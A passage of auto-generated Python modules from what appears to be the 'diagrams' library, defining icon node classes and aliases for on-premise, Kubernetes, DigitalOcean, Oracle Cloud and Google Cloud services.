class _Client(_OnPrem): _type = "client" _icon_dir = "resources/onprem/client" class Client(_Client): _icon = "client.png" class User(_Client): _icon = "user.png" class Users(_Client): _icon = "users.png" # Aliases File: diagrams/onprem/mlops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Mlops(_OnPrem): _type = "mlops" _icon_dir = "resources/onprem/mlops" class Mlflow(_Mlops): _icon = "mlflow.png" class Polyaxon(_Mlops): _icon = "polyaxon.png" # Aliases File: diagrams/onprem/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Security(_OnPrem): _type = "security" _icon_dir = "resources/onprem/security" class Bitwarden(_Security): _icon = "bitwarden.png" class Trivy(_Security): _icon = "trivy.png" class Vault(_Security): _icon = "vault.png" # Aliases File: diagrams/onprem/iac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Iac(_OnPrem): _type = "iac" _icon_dir = "resources/onprem/iac" class Ansible(_Iac): _icon = "ansible.png" class Atlantis(_Iac): _icon = "atlantis.png" class Awx(_Iac): _icon = "awx.png" class Puppet(_Iac): _icon = "puppet.png" class Terraform(_Iac): _icon = "terraform.png" # Aliases File: diagrams/onprem/__init__.py """ OnPrem provides a set of general on-premise services. """ from diagrams import Node class _OnPrem(Node): _provider = "onprem" _icon_dir = "resources/onprem" fontcolor = "#ffffff" File: diagrams/onprem/certificates.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Certificates(_OnPrem): _type = "certificates" _icon_dir = "resources/onprem/certificates" class CertManager(_Certificates): _icon = "cert-manager.png" class LetsEncrypt(_Certificates): _icon = "lets-encrypt.png" # Aliases File: diagrams/onprem/inmemory.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Inmemory(_OnPrem): _type = "inmemory" _icon_dir = "resources/onprem/inmemory" class Aerospike(_Inmemory): _icon = "aerospike.png" class Hazelcast(_Inmemory): _icon = "hazelcast.png" class Memcached(_Inmemory): _icon = "memcached.png" class Redis(_Inmemory): _icon = "redis.png" # Aliases File: diagrams/onprem/container.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Container(_OnPrem): _type = "container" _icon_dir = "resources/onprem/container" class Containerd(_Container): _icon = "containerd.png" class Crio(_Container): _icon = "crio.png" class Docker(_Container): _icon = "docker.png" class Firecracker(_Container): _icon = "firecracker.png" class Gvisor(_Container): _icon = "gvisor.png" class K3S(_Container): _icon = "k3s.png" class Lxc(_Container): _icon = "lxc.png" class Rkt(_Container): _icon = "rkt.png" # Aliases LXC = Lxc RKT = Rkt File: diagrams/onprem/proxmox.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Proxmox(_OnPrem): _type = "proxmox" _icon_dir = "resources/onprem/proxmox" class Pve(_Proxmox): _icon = "pve.png" # Aliases ProxmoxVE = Pve File: diagrams/onprem/vcs.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Vcs(_OnPrem): _type = "vcs" _icon_dir = "resources/onprem/vcs" class Git(_Vcs): _icon = "git.png" class Gitea(_Vcs): _icon = "gitea.png" class Github(_Vcs): _icon = "github.png" class Gitlab(_Vcs): _icon = "gitlab.png" class Svn(_Vcs): _icon = "svn.png" # Aliases File: diagrams/onprem/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Storage(_OnPrem): _type = "storage" _icon_dir = "resources/onprem/storage" class CephOsd(_Storage): _icon = "ceph-osd.png" class Ceph(_Storage): _icon = "ceph.png" class Glusterfs(_Storage): _icon = "glusterfs.png" class Portworx(_Storage): _icon = "portworx.png" # Aliases CEPH = Ceph CEPH_OSD = CephOsd File: diagrams/onprem/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Network(_OnPrem): _type = "network" _icon_dir = "resources/onprem/network" class Ambassador(_Network): _icon = "ambassador.png" class Apache(_Network): _icon = "apache.png" class Bind9(_Network): _icon = "bind-9.png" class Caddy(_Network): _icon = "caddy.png" class Consul(_Network): _icon = "consul.png" class Envoy(_Network): _icon = "envoy.png" class Etcd(_Network): _icon = "etcd.png" class Glassfish(_Network): _icon = "glassfish.png" class Gunicorn(_Network): _icon = "gunicorn.png" class Haproxy(_Network): _icon = "haproxy.png" class Internet(_Network): _icon = "internet.png" class Istio(_Network): _icon = "istio.png" class Jbossas(_Network): _icon = "jbossas.png" class Jetty(_Network): _icon = "jetty.png" class Kong(_Network): _icon = "kong.png" class Linkerd(_Network): _icon = "linkerd.png" class Nginx(_Network): _icon = "nginx.png" class Ocelot(_Network): _icon = "ocelot.png" class OpenServiceMesh(_Network): _icon = "open-service-mesh.png" class Opnsense(_Network): _icon = "opnsense.png" class Pfsense(_Network): _icon = "pfsense.png" class Pomerium(_Network): _icon = "pomerium.png" class Powerdns(_Network): _icon = "powerdns.png" class Tomcat(_Network): _icon = "tomcat.png" class Traefik(_Network): _icon = "traefik.png" class Tyk(_Network): _icon = "tyk.png" class Vyos(_Network): _icon = "vyos.png" class Wildfly(_Network): _icon = "wildfly.png" class Yarp(_Network): _icon = "yarp.png" class Zookeeper(_Network): _icon = "zookeeper.png" # Aliases ETCD = Etcd HAProxy = Haproxy OSM = OpenServiceMesh OPNSense = Opnsense PFSense = Pfsense VyOS = Vyos File: diagrams/onprem/search.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Search(_OnPrem): _type = "search" _icon_dir = "resources/onprem/search" class Solr(_Search): _icon = "solr.png" # Aliases File: diagrams/onprem/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Analytics(_OnPrem): _type = "analytics" _icon_dir = "resources/onprem/analytics" class Beam(_Analytics): _icon = "beam.png" class Databricks(_Analytics): _icon = "databricks.png" class Dbt(_Analytics): _icon = "dbt.png" class Dremio(_Analytics): _icon = "dremio.png" class Flink(_Analytics): _icon = "flink.png" class Hadoop(_Analytics): _icon = "hadoop.png" class Hive(_Analytics): _icon = "hive.png" class Metabase(_Analytics): _icon = "metabase.png" class Norikra(_Analytics): _icon = "norikra.png" class Powerbi(_Analytics): _icon = "powerbi.png" class Presto(_Analytics): _icon = "presto.png" class Singer(_Analytics): _icon = "singer.png" class Spark(_Analytics): _icon = "spark.png" class Storm(_Analytics): _icon = "storm.png" class Superset(_Analytics): _icon = "superset.png" class Tableau(_Analytics): _icon = "tableau.png" class Trino(_Analytics): _icon = "trino.png" # Aliases PowerBI = Powerbi File: diagrams/onprem/groupware.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Groupware(_OnPrem): _type = "groupware" _icon_dir = "resources/onprem/groupware" class Nextcloud(_Groupware): _icon = "nextcloud.png" # Aliases File: diagrams/onprem/workflow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Workflow(_OnPrem): _type = "workflow" _icon_dir = "resources/onprem/workflow" class Airflow(_Workflow): _icon = "airflow.png" class Digdag(_Workflow): _icon = "digdag.png" class Kubeflow(_Workflow): _icon = "kubeflow.png" class Nifi(_Workflow): _icon = "nifi.png" # Aliases KubeFlow = Kubeflow NiFi = Nifi File: diagrams/onprem/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Identity(_OnPrem): _type = "identity" _icon_dir = "resources/onprem/identity" class Dex(_Identity): _icon = "dex.png" # Aliases File: diagrams/onprem/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Compute(_OnPrem): _type = "compute" _icon_dir = "resources/onprem/compute" class Nomad(_Compute): _icon = "nomad.png" class Server(_Compute): _icon = "server.png" # Aliases File: diagrams/onprem/messaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Messaging(_OnPrem): _type = "messaging" _icon_dir = "resources/onprem/messaging" class Centrifugo(_Messaging): _icon = "centrifugo.png" # Aliases File: diagrams/onprem/cd.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Cd(_OnPrem): _type = "cd" _icon_dir = "resources/onprem/cd" class Spinnaker(_Cd): _icon = "spinnaker.png" class TektonCli(_Cd): _icon = "tekton-cli.png" class Tekton(_Cd): _icon = "tekton.png" # Aliases File: diagrams/k8s/controlplane.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Controlplane(_K8S): _type = "controlplane" _icon_dir = "resources/k8s/controlplane" class API(_Controlplane): _icon = "api.png" class CCM(_Controlplane): _icon = "c-c-m.png" class CM(_Controlplane): _icon = "c-m.png" class KProxy(_Controlplane): _icon = "k-proxy.png" class Kubelet(_Controlplane): _icon = "kubelet.png" class Sched(_Controlplane): _icon = "sched.png" # Aliases APIServer = API ControllerManager = CM KubeProxy = KProxy Scheduler = Sched File: diagrams/k8s/clusterconfig.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Clusterconfig(_K8S): _type = "clusterconfig" _icon_dir = "resources/k8s/clusterconfig" class HPA(_Clusterconfig): _icon = "hpa.png" class Limits(_Clusterconfig): _icon = "limits.png" class Quota(_Clusterconfig): _icon = "quota.png" # Aliases LimitRange = Limits HorizontalPodAutoscaler = HPA File: diagrams/k8s/chaos.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Chaos(_K8S): _type = "chaos" _icon_dir = "resources/k8s/chaos" class ChaosMesh(_Chaos): _icon = "chaos-mesh.png" class LitmusChaos(_Chaos): _icon = "litmus-chaos.png" # Aliases File: diagrams/k8s/rbac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Rbac(_K8S): _type = "rbac" _icon_dir = "resources/k8s/rbac" class CRole(_Rbac): _icon = "c-role.png" class CRB(_Rbac): _icon = "crb.png" class Group(_Rbac): _icon = "group.png" class RB(_Rbac): _icon = "rb.png" class Role(_Rbac): _icon = "role.png" class SA(_Rbac): _icon = "sa.png" class User(_Rbac): _icon = "user.png" # Aliases ClusterRole = CRole ClusterRoleBinding = CRB RoleBinding = RB ServiceAccount = SA File: diagrams/k8s/__init__.py """ K8S provides a set of services for Kubernetes. """ from diagrams import Node class _K8S(Node): _provider = "k8s" _icon_dir = "resources/k8s" fontcolor = "#2d3436" File: diagrams/k8s/podconfig.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Podconfig(_K8S): _type = "podconfig" _icon_dir = "resources/k8s/podconfig" class CM(_Podconfig): _icon = "cm.png" class Secret(_Podconfig): _icon = "secret.png" # Aliases ConfigMap = CM File: diagrams/k8s/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Storage(_K8S): _type = "storage" _icon_dir = "resources/k8s/storage" class PV(_Storage): _icon = "pv.png" class PVC(_Storage): _icon = "pvc.png" class SC(_Storage): _icon = "sc.png" class Vol(_Storage): _icon = "vol.png" # Aliases PersistentVolume = PV PersistentVolumeClaim = PVC StorageClass = SC Volume = Vol File: diagrams/k8s/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Network(_K8S): _type = "network" _icon_dir = "resources/k8s/network" class Ep(_Network): _icon = "ep.png" class Ing(_Network): _icon = "ing.png" class Netpol(_Network): _icon = "netpol.png" class SVC(_Network): _icon = "svc.png" # Aliases Endpoint = Ep Ingress = Ing NetworkPolicy = Netpol Service = SVC File: diagrams/k8s/group.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Group(_K8S): _type = "group" _icon_dir = "resources/k8s/group" class NS(_Group): _icon = "ns.png" # Aliases Namespace = NS File: diagrams/k8s/infra.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Infra(_K8S): _type = "infra" _icon_dir = "resources/k8s/infra" class ETCD(_Infra): _icon = "etcd.png" class Master(_Infra): _icon = "master.png" class Node(_Infra): _icon = "node.png" # Aliases File: diagrams/k8s/others.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Others(_K8S): _type = "others" _icon_dir = "resources/k8s/others" class CRD(_Others): _icon = "crd.png" class PSP(_Others): _icon = "psp.png" # Aliases File: diagrams/k8s/ecosystem.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Ecosystem(_K8S): _type = "ecosystem" _icon_dir = "resources/k8s/ecosystem" class ExternalDns(_Ecosystem): _icon = "external-dns.png" class Helm(_Ecosystem): _icon = "helm.png" class Krew(_Ecosystem): _icon = "krew.png" class Kustomize(_Ecosystem): _icon = "kustomize.png" # Aliases File: diagrams/k8s/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Compute(_K8S): _type = "compute" _icon_dir = "resources/k8s/compute" class Cronjob(_Compute): _icon = "cronjob.png" class Deploy(_Compute): _icon = "deploy.png" class DS(_Compute): _icon = "ds.png" class Job(_Compute): _icon = "job.png" class Pod(_Compute): _icon = "pod.png" class RS(_Compute): _icon = "rs.png" class STS(_Compute): _icon = "sts.png" # Aliases Deployment = Deploy DaemonSet = DS ReplicaSet = RS StatefulSet = STS File: diagrams/digitalocean/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Database(_DigitalOcean): _type = "database" _icon_dir = "resources/digitalocean/database" class DbaasPrimaryStandbyMore(_Database): _icon = "dbaas-primary-standby-more.png" class DbaasPrimary(_Database): _icon = "dbaas-primary.png" class DbaasReadOnly(_Database): _icon = "dbaas-read-only.png" class DbaasStandby(_Database): _icon = "dbaas-standby.png" # Aliases File: diagrams/digitalocean/__init__.py """ DigitalOcean provides a set of services for DigitalOcean provider. """ from diagrams import Node class _DigitalOcean(Node): _provider = "digitalocean" _icon_dir = "resources/digitalocean" fontcolor = "#ffffff" File: diagrams/digitalocean/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Storage(_DigitalOcean): _type = "storage" _icon_dir = "resources/digitalocean/storage" class Folder(_Storage): _icon = "folder.png" class Space(_Storage): _icon = "space.png" class VolumeSnapshot(_Storage): _icon = "volume-snapshot.png" class Volume(_Storage): _icon = "volume.png" # Aliases File: diagrams/digitalocean/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Network(_DigitalOcean): _type = "network" _icon_dir = "resources/digitalocean/network" class Certificate(_Network): _icon = "certificate.png" class DomainRegistration(_Network): _icon = "domain-registration.png" class Domain(_Network): _icon = "domain.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class ManagedVpn(_Network): _icon = "managed-vpn.png" class Vpc(_Network): _icon = "vpc.png" # Aliases File: diagrams/digitalocean/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Compute(_DigitalOcean): _type = "compute" _icon_dir = "resources/digitalocean/compute" class Containers(_Compute): _icon = "containers.png" class Docker(_Compute): _icon = "docker.png" class DropletConnect(_Compute): _icon = "droplet-connect.png" class DropletSnapshot(_Compute): _icon = "droplet-snapshot.png" class Droplet(_Compute): _icon = "droplet.png" class K8SCluster(_Compute): _icon = "k8s-cluster.png" class K8SNodePool(_Compute): _icon = "k8s-node-pool.png" class K8SNode(_Compute): _icon = "k8s-node.png" # Aliases File: diagrams/oci/connectivity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Connectivity(_OCI): _type = "connectivity" _icon_dir = "resources/oci/connectivity" class BackboneWhite(_Connectivity): _icon = "backbone-white.png" class Backbone(_Connectivity): _icon = "backbone.png" class CDNWhite(_Connectivity): _icon = "cdn-white.png" class CDN(_Connectivity): _icon = "cdn.png" class CustomerDatacenter(_Connectivity): _icon = "customer-datacenter.png" class CustomerDatacntrWhite(_Connectivity): _icon = "customer-datacntr-white.png" class CustomerPremiseWhite(_Connectivity): _icon = "customer-premise-white.png" class CustomerPremise(_Connectivity): _icon = "customer-premise.png" class DisconnectedRegionsWhite(_Connectivity): _icon = "disconnected-regions-white.png" class DisconnectedRegions(_Connectivity): _icon = "disconnected-regions.png" class DNSWhite(_Connectivity): _icon = "dns-white.png" class DNS(_Connectivity): _icon = "dns.png" class FastConnectWhite(_Connectivity): _icon = "fast-connect-white.png" class FastConnect(_Connectivity): _icon = "fast-connect.png" class NATGatewayWhite(_Connectivity): _icon = "nat-gateway-white.png" class NATGateway(_Connectivity): _icon = "nat-gateway.png" class VPNWhite(_Connectivity): _icon = "vpn-white.png" class VPN(_Connectivity): _icon = "vpn.png" # Aliases File: diagrams/oci/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Monitoring(_OCI): _type = "monitoring" _icon_dir = "resources/oci/monitoring" class AlarmWhite(_Monitoring): _icon = "alarm-white.png" class Alarm(_Monitoring): _icon = "alarm.png" class EmailWhite(_Monitoring): _icon = "email-white.png" class Email(_Monitoring): _icon = "email.png" class EventsWhite(_Monitoring): _icon = "events-white.png" class Events(_Monitoring): _icon = "events.png" class HealthCheckWhite(_Monitoring): _icon = "health-check-white.png" class HealthCheck(_Monitoring): _icon = "health-check.png" class NotificationsWhite(_Monitoring): _icon = "notifications-white.png" class Notifications(_Monitoring): _icon = "notifications.png" class QueueWhite(_Monitoring): _icon = "queue-white.png" class Queue(_Monitoring): _icon = "queue.png" class SearchWhite(_Monitoring): _icon = "search-white.png" class Search(_Monitoring): _icon = "search.png" class TelemetryWhite(_Monitoring): _icon = "telemetry-white.png" class Telemetry(_Monitoring): _icon = "telemetry.png" class WorkflowWhite(_Monitoring): _icon = "workflow-white.png" class Workflow(_Monitoring): _icon = "workflow.png" # Aliases File: diagrams/oci/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Database(_OCI): _type = "database" _icon_dir = "resources/oci/database" class AutonomousWhite(_Database): _icon = "autonomous-white.png" class Autonomous(_Database): _icon = "autonomous.png" class BigdataServiceWhite(_Database): _icon = "bigdata-service-white.png" class BigdataService(_Database): _icon = "bigdata-service.png" class DatabaseServiceWhite(_Database): _icon = "database-service-white.png" class DatabaseService(_Database): _icon = "database-service.png" class DataflowApacheWhite(_Database): _icon = "dataflow-apache-white.png" class DataflowApache(_Database): _icon = "dataflow-apache.png" class DcatWhite(_Database): _icon = "dcat-white.png" class Dcat(_Database): _icon = "dcat.png" class DisWhite(_Database): _icon = "dis-white.png" class Dis(_Database): _icon = "dis.png" class DMSWhite(_Database): _icon = "dms-white.png" class DMS(_Database): _icon = "dms.png" class ScienceWhite(_Database): _icon = "science-white.png" class Science(_Database): _icon = "science.png" class StreamWhite(_Database): _icon = "stream-white.png" class Stream(_Database): _icon = "stream.png" # Aliases ADB = Autonomous ADBWhite = AutonomousWhite DBService = DatabaseService DBServiceWhite = DatabaseServiceWhite File: diagrams/oci/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Security(_OCI): _type = "security" _icon_dir = "resources/oci/security" class CloudGuardWhite(_Security): _icon = "cloud-guard-white.png" class CloudGuard(_Security): _icon = "cloud-guard.png" class DDOSWhite(_Security): _icon = "ddos-white.png" class DDOS(_Security): _icon = "ddos.png" class EncryptionWhite(_Security): _icon = "encryption-white.png" class Encryption(_Security): _icon = "encryption.png" class IDAccessWhite(_Security): _icon = "id-access-white.png" class IDAccess(_Security): _icon = "id-access.png" class KeyManagementWhite(_Security): _icon = "key-management-white.png" class KeyManagement(_Security): _icon = "key-management.png" class MaxSecurityZoneWhite(_Security): _icon = "max-security-zone-white.png" class MaxSecurityZone(_Security): _icon = "max-security-zone.png" class VaultWhite(_Security): _icon = "vault-white.png" class Vault(_Security): _icon = "vault.png" class WAFWhite(_Security): _icon = "waf-white.png" class WAF(_Security): _icon = "waf.png" # Aliases File: diagrams/oci/__init__.py """ OCI provides a set of services for Oracle Cloud Infrastructure provider. """ from diagrams import Node class _OCI(Node): _provider = "oci" _icon_dir = "resources/oci" fontcolor = "#312D2A" File: diagrams/oci/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Devops(_OCI): _type = "devops" _icon_dir = "resources/oci/devops" class APIGatewayWhite(_Devops): _icon = "api-gateway-white.png" class APIGateway(_Devops): _icon = "api-gateway.png" class APIServiceWhite(_Devops): _icon = "api-service-white.png" class APIService(_Devops): _icon = "api-service.png" class ResourceMgmtWhite(_Devops): _icon = "resource-mgmt-white.png" class ResourceMgmt(_Devops): _icon = "resource-mgmt.png" # Aliases File: diagrams/oci/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Storage(_OCI): _type = "storage" _icon_dir = "resources/oci/storage" class BackupRestoreWhite(_Storage): _icon = "backup-restore-white.png" class BackupRestore(_Storage): _icon = "backup-restore.png" class BlockStorageCloneWhite(_Storage): _icon = "block-storage-clone-white.png" class BlockStorageClone(_Storage): _icon = "block-storage-clone.png" class BlockStorageWhite(_Storage): _icon = "block-storage-white.png" class BlockStorage(_Storage): _icon = "block-storage.png" class BucketsWhite(_Storage): _icon = "buckets-white.png" class Buckets(_Storage): _icon = "buckets.png" class DataTransferWhite(_Storage): _icon = "data-transfer-white.png" class DataTransfer(_Storage): _icon = "data-transfer.png" class ElasticPerformanceWhite(_Storage): _icon = "elastic-performance-white.png" class ElasticPerformance(_Storage): _icon = "elastic-performance.png" class FileStorageWhite(_Storage): _icon = "file-storage-white.png" class FileStorage(_Storage): _icon = "file-storage.png" class ObjectStorageWhite(_Storage): _icon = "object-storage-white.png" class ObjectStorage(_Storage): _icon = "object-storage.png" class StorageGatewayWhite(_Storage): _icon = "storage-gateway-white.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" # Aliases File: diagrams/oci/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Network(_OCI): _type = "network" _icon_dir = "resources/oci/network" class DrgWhite(_Network): _icon = "drg-white.png" class Drg(_Network): _icon = "drg.png" class FirewallWhite(_Network): _icon = "firewall-white.png" class Firewall(_Network): _icon = "firewall.png" class InternetGatewayWhite(_Network): _icon = "internet-gateway-white.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancerWhite(_Network): _icon = "load-balancer-white.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class RouteTableWhite(_Network): _icon = "route-table-white.png" class RouteTable(_Network): _icon = "route-table.png" class SecurityListsWhite(_Network): _icon = "security-lists-white.png" class SecurityLists(_Network): _icon = "security-lists.png" class ServiceGatewayWhite(_Network): _icon = "service-gateway-white.png" class ServiceGateway(_Network): _icon = "service-gateway.png" class VcnWhite(_Network): _icon = "vcn-white.png" class Vcn(_Network): _icon = "vcn.png" # Aliases File: diagrams/oci/governance.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Governance(_OCI): _type = "governance" _icon_dir = "resources/oci/governance" class AuditWhite(_Governance): _icon = "audit-white.png" class Audit(_Governance): _icon = "audit.png" class CompartmentsWhite(_Governance): _icon = "compartments-white.png" class Compartments(_Governance): _icon = "compartments.png" class GroupsWhite(_Governance): _icon = "groups-white.png" class Groups(_Governance): _icon = "groups.png" class LoggingWhite(_Governance): _icon = "logging-white.png" class Logging(_Governance): _icon = "logging.png" class OCIDWhite(_Governance): _icon = "ocid-white.png" class OCID(_Governance): _icon = "ocid.png" class PoliciesWhite(_Governance): _icon = "policies-white.png" class Policies(_Governance): _icon = "policies.png" class TaggingWhite(_Governance): _icon = "tagging-white.png" class Tagging(_Governance): _icon = "tagging.png" # Aliases File: diagrams/oci/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Compute(_OCI): _type = "compute" _icon_dir = "resources/oci/compute" class AutoscaleWhite(_Compute): _icon = "autoscale-white.png" class Autoscale(_Compute): _icon = "autoscale.png" class BMWhite(_Compute): _icon = "bm-white.png" class BM(_Compute): _icon = "bm.png" class ContainerWhite(_Compute): _icon = "container-white.png" class Container(_Compute): _icon = "container.png" class FunctionsWhite(_Compute): _icon = "functions-white.png" class Functions(_Compute): _icon = "functions.png" class InstancePoolsWhite(_Compute): _icon = "instance-pools-white.png" class InstancePools(_Compute): _icon = "instance-pools.png" class OCIRWhite(_Compute): _icon = "ocir-white.png" class OCIR(_Compute): _icon = "ocir.png" class OKEWhite(_Compute): _icon = "oke-white.png" class OKE(_Compute): _icon = "oke.png" class VMWhite(_Compute): _icon = "vm-white.png" class VM(_Compute): _icon = "vm.png" # Aliases VirtualMachine = VM VirtualMachineWhite = VMWhite BareMetal = BM BareMetalWhite = BMWhite OCIRegistry = OCIR OCIRegistryWhite = OCIRWhite ContainerEngine = OKE ContainerEngineWhite = OKEWhite File: diagrams/gcp/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Database(_GCP): _type = "database" _icon_dir = "resources/gcp/database" class Bigtable(_Database): _icon = "bigtable.png" class Datastore(_Database): _icon = "datastore.png" class Firestore(_Database): _icon = "firestore.png" class Memorystore(_Database): _icon = "memorystore.png" class Spanner(_Database): _icon = "spanner.png" class SQL(_Database): _icon = "sql.png" # Aliases BigTable = Bigtable File: diagrams/gcp/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Security(_GCP): _type = "security" _icon_dir = "resources/gcp/security" class Iam(_Security): _icon = "iam.png" class IAP(_Security): _icon = "iap.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class ResourceManager(_Security): _icon = "resource-manager.png" class SecurityCommandCenter(_Security): _icon = "security-command-center.png" class SecurityScanner(_Security): _icon = "security-scanner.png" # Aliases KMS = KeyManagementService SCC = SecurityCommandCenter File: diagrams/gcp/__init__.py """ GCP provides a set of services for Google Cloud Platform provider. """ from diagrams import Node class _GCP(Node): _provider = "gcp" _icon_dir = "resources/gcp" fontcolor = "#2d3436" File: diagrams/gcp/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _ML(_GCP): _type = "ml" _icon_dir = "resources/gcp/ml" class AdvancedSolutionsLab(_ML): _icon = "advanced-solutions-lab.png" class AIHub(_ML): _icon = "ai-hub.png" class AIPlatformDataLabelingService(_ML): _icon = "ai-platform-data-labeling-service.png" class AIPlatform(_ML): _icon = "ai-platform.png" class AutomlNaturalLanguage(_ML): _icon = "automl-natural-language.png" class AutomlTables(_ML): _icon = "automl-tables.png" class AutomlTranslation(_ML): _icon = "automl-translation.png" class AutomlVideoIntelligence(_ML): _icon = "automl-video-intelligence.png" class AutomlVision(_ML): _icon = "automl-vision.png" class Automl(_ML): _icon = "automl.png" class DialogFlowEnterpriseEdition(_ML): _icon = "dialog-flow-enterprise-edition.png" class InferenceAPI(_ML): _icon = "inference-api.png" class JobsAPI(_ML): _icon = "jobs-api.png" class NaturalLanguageAPI(_ML): _icon = "natural-language-api.png" class RecommendationsAI(_ML): _icon = "recommendations-ai.png" class SpeechToText(_ML): _icon = "speech-to-text.png" class TextToSpeech(_ML): _icon = "text-to-speech.png" class TPU(_ML): _icon = "tpu.png" class TranslationAPI(_ML): _icon = "translation-api.png" class VideoIntelligenceAPI(_ML): _icon = "video-intelligence-api.png" class VisionAPI(_ML): _icon = "vision-api.png" # Aliases AutoML = Automl NLAPI = NaturalLanguageAPI STT = SpeechToText TTS = TextToSpeech File: diagrams/gcp/api.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _API(_GCP): _type = "api" _icon_dir = "resources/gcp/api" class APIGateway(_API): _icon = "api-gateway.png" class Apigee(_API): _icon = "apigee.png" class Endpoints(_API): _icon = "endpoints.png" # Aliases File: diagrams/gcp/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Operations(_GCP): _type = "operations" _icon_dir = "resources/gcp/operations" class Logging(_Operations): _icon = "logging.png" class Monitoring(_Operations): _icon = "monitoring.png" # Aliases File: diagrams/gcp/devtools.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Devtools(_GCP): _type = "devtools" _icon_dir = "resources/gcp/devtools" class Build(_Devtools): _icon = "build.png" class CodeForIntellij(_Devtools): _icon = "code-for-intellij.png" class Code(_Devtools): _icon = "code.png" class ContainerRegistry(_Devtools): _icon = "container-registry.png" class GradleAppEnginePlugin(_Devtools): _icon = "gradle-app-engine-plugin.png" class IdePlugins(_Devtools): _icon = "ide-plugins.png" class MavenAppEnginePlugin(_Devtools): _icon = "maven-app-engine-plugin.png" class Scheduler(_Devtools): _icon = "scheduler.png" class SDK(_Devtools): _icon = "sdk.png" class SourceRepositories(_Devtools): _icon = "source-repositories.png" class Tasks(_Devtools): _icon = "tasks.png" class TestLab(_Devtools): _icon = "test-lab.png" class ToolsForEclipse(_Devtools): _icon = "tools-for-eclipse.png" class ToolsForPowershell(_Devtools): _icon = "tools-for-powershell.png" class ToolsForVisualStudio(_Devtools): _icon = "tools-for-visual-studio.png" # Aliases GCR = ContainerRegistry File: diagrams/gcp/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Storage(_GCP): _type = "storage" _icon_dir = "resources/gcp/storage" class Filestore(_Storage): _icon = "filestore.png" class PersistentDisk(_Storage): _icon = "persistent-disk.png" class Storage(_Storage): _icon = "storage.png" # Aliases GCS = Storage File: diagrams/gcp/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Network(_GCP): _type = "network" _icon_dir = "resources/gcp/network" class Armor(_Network): _icon = "armor.png" class CDN(_Network): _icon = "cdn.png" class DedicatedInterconnect(_Network): _icon = "dedicated-interconnect.png" class DNS(_Network): _icon = "dns.png" class ExternalIpAddresses(_Network): _icon = "external-ip-addresses.png" class FirewallRules(_Network): _icon = "firewall-rules.png" class LoadBalancing(_Network): _icon = "load-balancing.png" class NAT(_Network): _icon = "nat.png" class Network(_Network): _icon = 